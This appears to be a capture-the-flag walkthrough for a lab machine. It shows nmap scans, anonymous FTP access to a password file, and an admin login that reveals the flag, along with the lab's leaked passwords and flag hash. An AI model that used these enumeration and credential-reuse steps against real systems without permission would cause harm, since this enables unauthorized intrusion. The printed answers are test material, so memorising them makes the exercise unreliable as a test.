# Task 1

Q: What nmap scanning switch employs the use of default scripts during a scan?

A: -sC

# Task 2

Q: What service version is found to be running on port 21?

┌──(root💀kali)-[~]
└─# nmap -sV -Pn -p21 10.129.1.15   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:47 CST
Nmap scan report for 10.129.1.15
Host is up (0.27s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds

-sV: detect service versions only
-Pn: skip the ping scan (host discovery)

A: vsFTPd 3.0.3

# Task 3

Q: What FTP code is returned to us for the "Anonymous FTP login allowed" message?

┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p21 10.129.1.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:50 CST
Nmap scan report for 10.129.1.15
Host is up (0.51s latency).
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.86
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

Line 9 of the output shows that anonymous login is allowed; the response code is 230.

A: 230

# Task 4

Q: What command can we use to download the files we find on the FTP server?

A: get

# Task 5

Q: What is one of the higher-privilege sounding usernames in the list we retrieved?

This requires logging in over FTP and downloading the file with get, but based on the hint you can simply guess admin.

A: admin

# Task 6

Q: What version of Apache HTTP Server is running on the target host?

┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.129.1.15 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:55 CST
Nmap scan report for 10.129.1.15
Host is up (0.62s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.59 seconds

Line 9 makes it obvious. This scan lists the versions of every open service; to query only one port, add the parameter -p80.

A: 2.4.41

# Task 7

Q: What is the name of a handy web site analysis plug-in we can install in our browser?

A: wappalyzer

# Task 8

Q: What switch can we use with gobuster to specify we are looking for specific filetypes?

A: -x

# Task 9

Q: What file have we found that can provide us a foothold on the target?

A: login.php

# Flag

Log in over FTP and download the password file.

┌──(root💀kali)-[~]
└─# ftp 10.129.1.15
Connected to 10.129.1.15.
220 (vsFTPd 3.0.3)
Name (10.129.1.15:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
226 Directory send OK.
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
226 Transfer complete.
62 bytes received in 0.00 secs (197.2211 kB/s)
ftp> exit
221 Goodbye.

The fourth entry is the admin password.

┌──(root💀kali)-[~]
└─# cat allowed.userlist.passwd 
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd

Log in directly as admin to get the flag.

flag: c7110277ac44d78b6a9fff2232434d16